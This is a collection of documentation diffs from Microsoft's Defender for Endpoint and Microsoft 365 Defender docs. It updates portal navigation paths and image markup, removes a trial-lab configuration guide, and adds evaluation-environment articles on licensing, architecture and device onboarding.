As part of the process of creating a device group, you'll:
## Create a device group
-1. In the navigation pane, select **Settings** > **Device groups**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Permissions** > **Device groups**.
2. Click **Add device group**.
security Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-tags.md
To add device tags using API, see [Add or remove device tags API](add-or-remove-
2. Select **Manage Tags** from the row of Response actions.
- ![Image of manage tags button](images/manage-tags.png)
+ :::image type="content" alt-text="Image of manage tags button." source="images/manage-tags-option.png":::
3. Type to find or create tags
- ![Image of adding tags on a device1](images/new-tags.png)
+ :::image type="content" alt-text="Image of adding tags on a device1." source="images/create-new-tag.png":::
Tags are added to the device view and will also be reflected on the **Devices list** view. You can then use the **Tags** filter to see the relevant list of devices.
Tags are added to the device view and will also be reflected on the **Devices li
You can also delete tags from this view.
-![Image of adding tags on a device2](images/more-manage-tags.png)
## Add device tags by setting a registry key value
security Manage Automation File Uploads https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-file-uploads.md
For example, if you add *exe* and *bat* as file or attachment extension names, t
## Add file extension names and attachment extension names.
-1. In the navigation pane, select **Settings** > **Automation file uploads**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation uploads**.
2. Toggle the content analysis setting between **On** and **Off**.
security Manage Automation Folder Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-folder-exclusions.md
You can specify the file names that you want to be excluded in a specific direct
## Add an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **New folder exclusion**.
You can specify the file names that you want to be excluded in a specific direct
- Extensions - File names - Description
-
4. Click **Save**.
You can specify the file names that you want to be excluded in a specific direct
> Live Response commands to collect or examine excluded files will fail with error: "File is excluded". In addition, automated investigations will ignore the excluded items. ## Edit an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **Edit** on the folder exclusion. 3. Update the details of the rule and click **Save**. ## Remove an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **Remove exclusion**.
security Manage Suppression Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-suppression-rules.md
There might be scenarios where you need to suppress alerts from appearing in the
You can view a list of all the suppression rules and manage them in one place. You can also turn an alert suppression rule on or off.
-1. In the navigation pane, select **Settings** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
2. Select a rule by clicking on the check-box beside the rule name.
You can view a list of all the suppression rules and manage them in one place. Y
## View details of a suppression rule
-1. In the navigation pane, select **Settings** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
2. Click on a rule name. Details of the rule is displayed. You'll see the rule details such as status, scope, action, number of matching alerts, created by, and date when the rule was created. You can also view associated alerts and the rule conditions.
security Switch To Microsoft Defender Migration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-microsoft-defender-migration.md
The process of migrating to Defender for Endpoint can be divided into three phas
|Phase |Description | |--|--|
-|[Prepare for your migration](switch-to-microsoft-defender-prepare.md) |During [the **Prepare** phase](switch-to-microsoft-defender-prepare.md): <p>1. Update your organization's devices. <p>2. Get Defender for Endpoint. <p>3. Plan your roles and permissions, and grant access to the Microsoft Defender Security Center. <p>4. Configure your device proxy and internet settings to enable communication between your organization's devices and Defender for Endpoint. |
+|[Prepare for your migration](switch-to-microsoft-defender-prepare.md) |During [the **Prepare** phase](switch-to-microsoft-defender-prepare.md): <p>1. Update your organization's devices. <p>2. Get Defender for Endpoint. <p>3. Plan your roles and permissions, and grant access to the Microsoft 365 Defender portal. <p>4. Configure your device proxy and internet settings to enable communication between your organization's devices and Defender for Endpoint. |
|[Set up Defender for Endpoint](switch-to-microsoft-defender-setup.md) |During [the **Setup** phase](switch-to-microsoft-defender-setup.md): <p>1. Enable/reinstall Microsoft Defender Antivirus. <p>2. Configure Defender for Endpoint. <p>3. Add Defender for Endpoint to the exclusion list for your existing solution. <p>4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus. <p>5. Set up your device groups, collections, and organizational units. <p>6. Configure your antimalware policies and real-time protection settings.| |[Onboard to Defender for Endpoint](switch-to-microsoft-defender-onboard.md) |During [the **Onboard** phase](switch-to-microsoft-defender-onboard.md): <p>1. Onboard your devices to Defender for Endpoint. <p>2. Run a detection test. <p>3. Confirm that Microsoft Defender Antivirus is running in passive mode. <p>4. Get updates for Microsoft Defender Antivirus. <p>5. Uninstall your existing endpoint protection solution. <p>6. Make sure that Defender for Endpoint working correctly. |
security Tvm Microsoft Secure Score Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tvm-microsoft-secure-score-devices.md
ms.technology: mde
>[!NOTE] > Configuration score is now part of threat and vulnerability management as Microsoft Secure Score for Devices.
-Your score for devices is visible in the [threat and vulnerability management dashboard](tvm-dashboard-insights.md) of the Microsoft Defender Security Center. A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks. It reflects the collective security configuration state of your devices across the following categories:
+Your score for devices is visible in the [threat and vulnerability management dashboard](tvm-dashboard-insights.md) of the Microsoft 365 Defender portal. A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks. It reflects the collective security configuration state of your devices across the following categories:
- Application - Operating system
Forward Microsoft Defender for Endpoint signals, giving Microsoft Secure Score v
Changes might take up to a few hours to reflect in the dashboard.
-1. In the navigation pane, go to **Settings** > **Advanced features**
+1. In the navigation pane, go to **Settings** > **Endpoints** > **General** > **Advanced features**
2. Scroll down to **Microsoft Secure Score** and toggle the setting to **On**.
The data in the Microsoft Secure Score for Devices card is the product of meticu
Improve your security configuration by remediating issues from the security recommendations list. As you do so, your Microsoft Secure Score for Devices improves and your organization becomes more resilient against cybersecurity threats and vulnerabilities.
-1. From the Microsoft Secure Score for Devices card in the threat and vulnerability management dashboard, select the one of the categories. You'll view the list of recommendations related to that category. It will take you to the [**Security recommendations**](tvm-security-recommendation.md) page. If you want to see all security recommendations, once you get to the Security recommendations page, clear the search field.
+1. From the Microsoft Secure Score for Devices card in the threat and vulnerability management dashboard, select one of the categories. You'll view the list of recommendations related to that category. It will take you to the [**Security recommendations**](tvm-security-recommendation.md) page. If you want to see all security recommendations, once you get to the Security recommendations page, clear the search field.
2. Select an item on the list. The flyout panel will open with details related to the recommendation. Select **Remediation options**.
- ![Security controls related security recommendations](images/tvm_security_controls.png)
+ :::image type="content" alt-text="Security controls related security recommendations." source="images/security-controls.png":::
3. Read the description to understand the context of the issue and what to do next. Select a due date, add notes, and select **Export all remediation activity data to CSV** so you can attach it to an email for follow-up. 4. **Submit request**. You'll see a confirmation message that the remediation task has been created.
- ![Remediation task creation confirmation](images/tvm_remediation_task_created.png)
+
+ :::image type="content" alt-text="Remediation task creation confirmation." source="images/remediation-task-created.png":::
5. Save your CSV file.
- ![Save csv file](images/tvm_save_csv_file.png)
+
+ :::image type="content" alt-text="Save csv file." source="images/tvm_save_csv_file.png":::
6. Send a follow-up email to your IT Administrator and allow the time that you've allotted for the remediation to propagate in the system.
security Config M365d Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/config-m365d-eval.md
- Title: Configure Microsoft 365 Defender pillars for the trial lab or pilot environment
-description: Configure Microsoft 365 Defender pillars, such as Microsoft Defender for Office 365 , Microsoft Defender for Identity, Microsoft Cloud App Security, and Microsoft Defender for Endpoint, for your trial lab or pilot environment.
-keywords: configure Microsoft 365 Defender trial, Microsoft 365 Defender trial configuration, configure Microsoft 365 Defender pilot project, configure Microsoft 365 Defender pillars, Microsoft 365 Defender pillars
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-evalutatemtp
---
-# Configure Microsoft 365 Defender pillars for your trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender--
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|[![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-|| |*You are here!* | |
-
-You're currently in the configuration phase.
-
-Preparation is key to any successful deployment. In this article, you'll be guided on the points you'll need to consider as you prepare to deploy Microsoft Defender for Endpoint.
-
-## Microsoft 365 Defender pillars
-Microsoft 365 Defender consists of four pillars. Although one pillar can already provide value to your network organization's security, enabling the four Microsoft 365 Defender pillars will give your organization the most value.
-
-![Image of_Microsoft 365 Defender solution for users, Microsoft Defender for Identity, for endpoints Microsoft Defender for Endpoint, for cloud apps, Microsoft Cloud App Security, and for data, Microsoft Defender for Office 365](../../media/mtp/m365pillars.png)
-
-This section will guide you to configure:
--- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Cloud App Security-- Microsoft Defender for Endpoint-
-## Configure Microsoft Defender for Office 365
-
-> [!NOTE]
-> Skip this step if you've already enabled Defender for Office 365.
-
-There's a PowerShell Module called the *Office 365 Advanced Threat Protection Recommended Configuration Analyzer (ORCA)* that helps determine some of these settings. When run as an administrator in your tenant, get-ORCAReport will help generate an assessment of the anti-spam, anti-phish, and other message hygiene settings. You can download this module from https://www.powershellgallery.com/packages/ORCA/.
-
-1. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Threat management** > **Policy**.
-
- ![Image of_Office 365 Security & Compliance Center Threat management policy page](../../media/mtp-eval-32.png)
-
-2. Click **Anti-phishing**, select **Create** and fill in the policy name and description. Click **Next**.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can name your policy](../../media/mtp-eval-33.png)
-
- > [!NOTE]
- > Edit your Advanced anti-phishing policy in Microsoft Defender for Office 365. Change **Advanced Phishing Threshold** to **2 - Aggressive**.
-
-3. Click the **Add a condition** drop-down menu and select your domain(s) as recipient domain. Click **Next**.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can add a condition for its application](../../media/mtp-eval-34.png)
-
-4. Review your settings. Click **Create this policy** to confirm.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can review your settings and click the create this policy button](../../media/mtp-eval-35.png)
-
-5. Select **Safe Attachments** and select the **Turn on ATP for SharePoint, OneDrive, and Microsoft Teams** option.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn on ATP for SharePoint, OneDrive, and Microsoft Teams](../../media/mtp-eval-36.png)
-
-6. Click the + icon to create a new safe attachment policy, apply it as recipient domain to your domains. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page where you can create a new create a new safe attachment policy](../../media/mtp-eval-37.png)
-
-7. Next, select the **Safe Links** policy, then click the pencil icon to edit the default policy.
-
-8. Make sure that the **Do not track when users click safe links** option is not selected, while the rest of the options are selected. See [Safe Links settings](/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365) for details. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page which shows that the option Do not track when users click safe is not selected](../../media/mtp-eval-38.png)
-
-9. Next select the **Anti-malware** policy, select the default, and choose the pencil icon.
-
-10. Click **Settings** and select **Yes and use the default notification text** to enable **Malware Detection Response**. Turn the **Common Attachment Types Filter** on. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page which shows that the malware detection response is turned on with default notification and the common attachment types filter is turned on](../../media/mtp-eval-39.png)
-
-11. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Search** > **Audit log search** and turn Auditing on.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn on the Audit log search](../../media/mtp-eval-40.png)
-
-12. Integrate Microsoft Defender for Office 365 with Microsoft Defender for Endpoint. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Threat management** > **Explorer** and select **Microsoft Defender for Endpoint Settings** on the upper right corner of the screen. In the Defender for Endpoint connection dialog box, turn on **Connect to Microsoft Defender for Endpoint**.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn Microsoft Defender for Endpoint connection on](../../media/mtp-eval-41.png)
-
-## Configure Microsoft Defender for Identity
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Defender for Identity
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > select **More Resources** > **Microsoft Defender for Identity**.
-
- ![Image of_Microsoft 365 Security Center page where there's an option to open Microsoft Defender for Identity](../../media/mtp-eval-42.png)
-
-2. Click **Create** to start the Microsoft Defender for Identity wizard.
-
- ![Image of_Microsoft Defender for Identity wizard page where you should click Create button](../../media/mtp-eval-43.png)
-
-3. Choose **Provide a username and password to connect to your Active Directory forest**.
-
- ![Image of_Microsoft Defender for Identity welcome page](../../media/mtp-eval-44.png)
-
-4. Enter your Active Directory on-premises credentials. This can be any user account that has read access to Active Directory.
-
- ![Image of_Microsoft Defender for Identity Directory services page where you should put your credentials](../../media/mtp-eval-45.png)
-
-5. Next, choose **Download Sensor Setup** and transfer file to your domain controller.
-
- ![Image of_Microsoft Defender for Identity page where you can select Download Sensor Setup](../../media/mtp-eval-46.png)
-
-6. Execute the Microsoft Defender for Identity Sensor Setup and begin following the wizard.
-
- ![Image of_Microsoft Defender for Identity page where you should click next to follow the Microsoft Defender for Identity sensor wizard](../../media/mtp-eval-47.png)
-
-7. Click **Next** at the sensor deployment type.
-
- ![Image of_Microsoft Defender for Identity page where you should click next to go to next page](../../media/mtp-eval-48.png)
-
-8. Copy the access key because you need to enter it next in the Wizard.
-
- ![Image of_the sensors page where you should copy the access key that you need to enter in the next Microsoft Defender for Identity sensor setup wizard page](../../media/mtp-eval-49.png)
-
-9. Copy the access key into the Wizard and click **Install**.
-
- ![Image of_Microsoft Defender for Identity sensor wizard page where you should provide the access key and then click the install button](../../media/mtp-eval-50.png)
-
-10. Congratulations, you've successfully configured Microsoft Defender for Identity on your domain controller.
-
- ![Image of_Microsoft Defender for Identity sensor wizard installation completion where you should click the finish button](../../media/mtp-eval-51.png)
-
-11. Under the [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?linkid=2040449) settings section, select **Microsoft Defender for Endpoint **, then turn on the toggle. Click **Save**.
-
- ![Image of_the Microsoft Defender for Identity settings page where you should turn the Microsoft Defender for Endpoint toggle on](../../media/mtp-eval-52.png)
-
-## Configure Microsoft Cloud App Security
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Cloud App Security.
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > **More Resources** > **Microsoft Cloud App Security**.
-
- ![Image of_Microsoft 365 Security Center page where you can see Microsoft Cloud App card and should click the open button](../../media/mtp-eval-53.png)
-
-2. At the information prompt to integrate Microsoft Defender for Identity, select **Enable Microsoft Defender for Identity data integration**.
-
- ![Image of_the information prompt to integrate Microsoft Defender for Identity where you should select the Enable Microsoft Defender for Identity data integration link](../../media/mtp-eval-54.png)
-
- > [!NOTE]
- > If you donΓÇÖt see this prompt, it might mean that your Microsoft Defender for Identity data integration has already been enabled. However, if you are not sure, contact your IT Administrator to confirm.
-
-3. Go to **Settings**, turn on the **Microsoft Defender for Identity integration** toggle, then click **Save**.
-
- ![Image of_the settings page where you should turn on the Microsoft Defender for Identity integration toggle then click save](../../media/mtp-eval-55.png)
-
- > [!NOTE]
- > For new Microsoft Defender for Identity instances, this integration toggle is automatically turned on. Confirm that your Microsoft Defender for Identity integration has been enabled before you proceed to the next step.
-
-4. Under the Cloud discovery settings, select **Microsoft Defender for Endpoint integration**, then enable the integration. Click **Save**.
-
- ![Image of_the Microsoft Defender for Endpoint page where the block unsanctioned apps checkbox under Microsoft Defender for Endpoint integration is selected. Click save.](../../media/mtp-eval-56.png)
-
-5. Under Cloud discovery settings, select **User enrichment**, then enable the integration with Azure Active Directory.
-
- ![Image of User enrichment section where the enrich discovered user identifiers with Azure Active Directory usernames checkbox is selected](../../media/mtp-eval-57.png)
-
-## Configure Microsoft Defender for Endpoint
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Defender for Endpoint.
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > **More Resources** > **Microsoft Defender Security Center**. Click **Open**.
-
- ![Image of_Microsoft Defender Security Center option in the Microsoft 365 Security Center page](../../media/mtp-eval-58.png)
-
-2. Follow the Microsoft Defender for Endpoint wizard. Click **Next**.
-
- ![Image of_the Microsoft Defender Security Center welcome wizard page](../../media/mtp-eval-59.png)
-
-3. Choose based on your preferred data storage location, data retention policy, organization size, and opt-in for preview features.
-
- ![Image of_the page to select your data storage country, retention policy, and organization size. Click next when you're done selecting.](../../media/mtp-eval-60.png)
-
- > [!NOTE]
- > You cannot change some of the settings, like data storage location, afterwards.
-
- Click **Next**.
-
-4. Click **Continue** and it will provision your Microsoft Defender for Endpoint tenant.
-
- ![Image of_the page prompting you click the continue button to create your cloud instance](../../media/mtp-eval-61.png)
-
-5. Onboard your endpoints through Group Policies, Microsoft Endpoint Manager or by running a local script to Microsoft Defender for Endpoint. For simplicity, this guide uses the local script.
-
-6. Click **Download package** and copy the onboarding script to your endpoint(s).
-
- ![Image of_page prompting you click the Download package button to copy the onboarding script to your endpoint or endpoints](../../media/mtp-eval-62.png)
-
-7. On your endpoint, run the onboarding script as Administrator and choose Y.
-
- ![Image of_the commandline where you run the onboarding script and choose Y to proceed](../../media/mtp-eval-63.png)
-
-8. Congratulations, you've onboarded your first endpoint.
-
- ![Image of_the commandline where you get the confirmation that you've onboarded your first endpoint. Press any key to continue](../../media/mtp-eval-64.png)
-
-9. Copy-paste the detection test from the Microsoft Defender for Endpoint wizard.
-
- ![Image of_the run a detection test step where you should click Copy to copy the detection test script that you should paste in the command prompt](../../media/mtp-eval-65.png)
-
-10. Copy the PowerShell script to an elevated command prompt and run it.
-
- ![Image of_command prompt where you should copy the PowerShell script to an elevated command prompt and run it](../../media/mtp-eval-66.png)
-
-11. Select **Start using Microsoft Defender for Endpoint** from the Wizard.
-
- ![Image of_the confirmation prompt from the wizard where you should click Start using Microsoft Defender for Endpoint](../../media/mtp-eval-67.png)
-
-12. Visit the [Microsoft Defender Security Center](https://securitycenter.windows.com/). Go to **Settings** and then select **Advanced features**.
-
- ![Image of_Microsoft Defender Security Center Settings menu where you should select Advanced features](../../media/mtp-eval-68.png)
-
-13. Turn on the integration with **Microsoft Defender for Identity**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Microsoft Defender for Identity option toggle that you need to turn on](../../media/mtp-eval-69.png)
-
-14. Turn on the integration with **Office 365 Threat Intelligence**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Office 365 Threat Intelligence option toggle that you need to turn on](../../media/mtp-eval-70.png)
-
-15. Turn on integration with **Microsoft Cloud App Security**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Microsoft Cloud App Security option toggle that you need to turn on](../../media/mtp-eval-71.png)
-
-16. Scroll down and click **Save preferences** to confirm the new integrations.
-
- ![Image of_Save preferences button that you need to click](../../media/mtp-eval-72.png)
-
-## Start the Microsoft 365 Defender service
-
-> [!NOTE]
-> Starting June 1, 2020, Microsoft automatically enables Microsoft 365 Defender features for all eligible tenants. See this [Microsoft Tech Community article on license eligibility](https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/microsoft-threat-protection-will-automatically-turn-on-for/ba-p/1345426) for details.
-
-Go to [Microsoft 365 Security Center](https://security.microsoft.com/homepage). Navigate to **Settings** and then select **Microsoft 365 Defender**.
-
-![Image of_Microsoft 365 Defender option screenshot from the Microsoft 365 Security Center Settings page](../../media/mtp-eval-72b.png)
-
-For a more comprehensive guidance, see [Turn on Microsoft 365 Defender](m365d-enable.md).
-
-Congratulations! You've just created your Microsoft 365 Defender trial lab or pilot environment! Now you can familiarize yourself with the Microsoft 365 Defender user interface! See what you can learn from the following Microsoft 365 Defender interactive guide and know how to use each dashboard for your day-to-day security operation tasks.
-
-[Check out the interactive guide](https://aka.ms/MTP-Interactive-Guide)
-
-Next, you can simulate an attack and see how the cross product capabilities detect, create alerts, and automatically respond to a fileless attack on an endpoint.
-
-## Next step
--- [Generate a test alert](generate-test-alert.md) - Run an attack simulation in your Microsoft 365 Defender trial lab.
security Eval Create Eval Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-create-eval-environment.md
+
+ Title: Create the Microsoft 365 Defender Evaluation Environment. Activate or enable trial licenses, and continue on to Microsoft Defender for Identity (MDI).
+description: Set up your Microsoft 365 Defender trial lab or pilot environment by activating trial licenses. Then set up Microsoft Defender for Identity (MDI) and all other M365D evaluations.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 05/19/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
+
+# Create the Microsoft 365 Defender Evaluation Environment
+
+There are two common ways to do this next step in evaluation. This document assumes you already have a production M365 tenant, and will activate E5 trial licenses to evaluate M365 Defender in *the current environment*. An in-place evaluation will let you keep any security methods with the purchase of licenses after the evaluation period.
+
+The second is to [Set up your Microsoft 365 Defender trial lab environment](setup-m365deval.md) for the purpose of evaluation. It may not have many real signals from the business, so be aware of that caveat.
+
+## To activate E5 trial licenses to evaluate Microsoft 365 Defender
+1. Log on to your existing M365 tenant administration portal.
+2. Select *Purchase Services* from the navigation menu.
+3. Scroll down to the *Office 365* section and select "Details" button under Office 365 E5 license.
++
+4. Select *Start free trial* link.
++
+5. Confirm your request and click *Try now* button.
++
+## Next steps
+[Enable Microsoft 365 for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Endpoint Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-architecture.md
+
+ Title: Review Microsoft Defender for Endpoint architecture requirements and key concepts
+description: The technical diagram for Microsoft Defender for Endpoint in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review Microsoft Defender for Endpoint architecture requirements and key concepts
+
+**Applies to:**
+Microsoft 365 Defender
+
+This article will guide you in the process of setting up the evaluation for Microsoft Defender for Endpoint environment.
+
+For more information about this process, see the [overview article](eval-defender-endpoint-overview.md).
+
+Before enabling Microsoft Defender for Endpoint, be sure you understand the architecture and can meet the requirements.
+
+## Understand the architecture
+
+The following diagram illustrates Microsoft Defender for Endpoint architecture and integrations.
+
+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-architecture.png)
+
+The following table describes the illustration.
+
+Call-out | Description
+:|:|
+1 | Devices are on-boarded through one of the supported management tools.
+2 | On-boarded devices provide and respond to Microsoft Defender for Endpoint signal data.
+3 | Managed devices are joined and/or enrolled in Azure Active Directory.
+4 | Domain-joined Windows 10 devices are synchronized to Azure Active Directory using Azure Active Directory Connect.
+5 | Microsoft Defender for Endpoint alerts, investigations, and responses are managed in Microsoft 365 Defender.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Endpoint:
+
+Concept | Description | More information
+:|:|:|
+Administration Portal | Microsoft 365 Defender portal to monitor and assist in responding to alerts of potential advanced persistent threat activity or data breaches. | [Microsoft Defender for Endpoint portal overview](/defender-endpoint/portal-overview)
+Attack Surface Reduction | Help reduce your attack surfaces by minimizing the places where your organization is vulnerable to cyberthreats and attacks. | [Overview of attack surface reduction](/defender-endpoint/overview-attack-surface-reduction)
+Endpoint Detection and Response | Endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. | [Overview of endpoint detection and response capabilities](/defender-endpoint/overview-endpoint-detection-response)
+Behavioral Blocking and Containment | Behavioral blocking and containment capabilities can help identify and stop threats, based on their behaviors and process trees even when the threat has started execution. | [Behavioral blocking and containment](/defender-endpoint/behavioral-blocking-containment)
+Automated Investigation and Response | Automated investigation uses various inspection algorithms based on processes that are used by security analysts and designed to examine alerts and take immediate action to resolve breaches. | [Use automated investigations to investigate and remediate threats](/defender-endpoint/automated-investigations)
+Advanced Hunting | Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30 days of raw data so that you can proactively inspect events in your network to locate threat indicators and entities. | [Overview of advanced hunting](/defender-endpoint/advanced-hunting-overview)
+Threat Analytics | Threat analytics is a set of reports from expert Microsoft security researchers covering the most relevant threats. | [Track and respond to emerging threats](/defender-endpoint/threat-analytics)
++
+For more detailed information about the capabilities included with Microsoft Defender for Endpoint, see [What is Microsoft Defender for Endpoint](/defender-endpoint/microsoft-defender-endpoint).
+
+## SIEM integration
+
+You can integrate Microsoft Defender for Endpoint with Azure Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response.
+
+Microsoft Defender for Endpoint can also be integrated into other Security Information and Event Management (SIEM) solutions. For more information, see [Enable SIEM integration in Microsoft Defender for Endpoint](/defender-endpoint/enable-siem-integration).
++
+## Next steps
+[Enable the evaluation](eval-defender-endpoint-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Endpoint Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-enable-eval.md
+
+ Title: Enable Microsoft Defender for Endpoint evaluation, activate the evaluation for MDE
+description: Enable your Microsoft 365 Defender trial lab or pilot environment, including checking license state, and onboarding enpoints
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable Microsoft Defender for Endpoint evaluation environment
++
+This article will guide you through the steps on setting up the evaluation environment for Microsoft Defender for Endpoint using production devices.
++
+>[!TIP]
+>Microsoft Defender for Endpoint also comes with an in-product evaluation lab where you can add pre-configured devices and run simulations to evaluate the capabilities of the platform. The lab comes with a simplified set-up experience that can help quickly demonstrate the value of Microsoft Defender for Enpdoint including guidance for many features like advanced hunting and threat analytics. For more information, see [Evaluate capabilities](/defender-endpoint/evaluation-lab.md). <br> The main difference between the guidance provided in this article and the evaluation lab is the evaluation environment uses production devices whereas the evaluation lab uses non-production devices.
+
+Use the following steps to enable the evaluation for Microsoft Defender for Endpoint.
+
+![Steps to enable Microsoft Defender for Endpoint in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-endpoint-eval-enable-steps.png)
+
+- [Step 1. Check license state](#step-1-check-license-state)
+- [Step 2. Onboard endpoints](#step-2-onboard-endpoints-using-any-of-the-supported-management-tools)
++
+## Step 1. Check license state
+
+You'll first need to check the license state to verify that it was properly provisioned. You can do this through the admin center or through the **Microsoft Azure portal**.
++
+1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
+
+ ![Image of Azure Licensing page](../../media/defender/atp-licensing-azure-portal.png)
+
+1. Alternately, in the admin center, navigate to **Billing** > **Subscriptions**.
+
+ On the screen, you'll see all the provisioned licenses and their current **Status**.
+
+ ![Image of billing licenses](../../media/defender/atp-billing-subscriptions.png)
+
+## Step 2. Onboard endpoints using any of the supported management tools
+
+After verifying that the license state has been provisioned properly, you can start onboarding devices to the service.
+
+For the purpose of evaluating Microsoft Defender for Endpoint, we recommend choosing a couple of Windows 10 devices to conduct the evaluation on.
+
+The [Plan deployment](../defender-endpoint/deployment-strategy.md) topic outlines the general steps you need to take to deploy Defender for Endpoint.
+
+Watch this video for a quick overview of the onboarding process and learn about the available tools and methods.
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
+
+### Onboarding tool options
+
+The following table lists the available tools based on the endpoint that you need to onboard.
+
+Endpoint | Tool options
+:|:
+**Windows** | [Local script (up to 10 devices)](../defender-endpoint/configure-endpoints-script.md), [Group Policy](../defender-endpoint/configure-endpoints-gp.md), [Microsoft Endpoint Manager/ Mobile Device Manager](../defender-endpoint/configure-endpoints-mdm.md), [Microsoft Endpoint Configuration Manager](../defender-endpoint/configure-endpoints-sccm.md), [VDI scripts](../defender-endpoint/configure-endpoints-vdi.md), [Integration with Azure Defender](../defender-endpoint/configure-server-endpoints.md#integration-with-azure-defender)
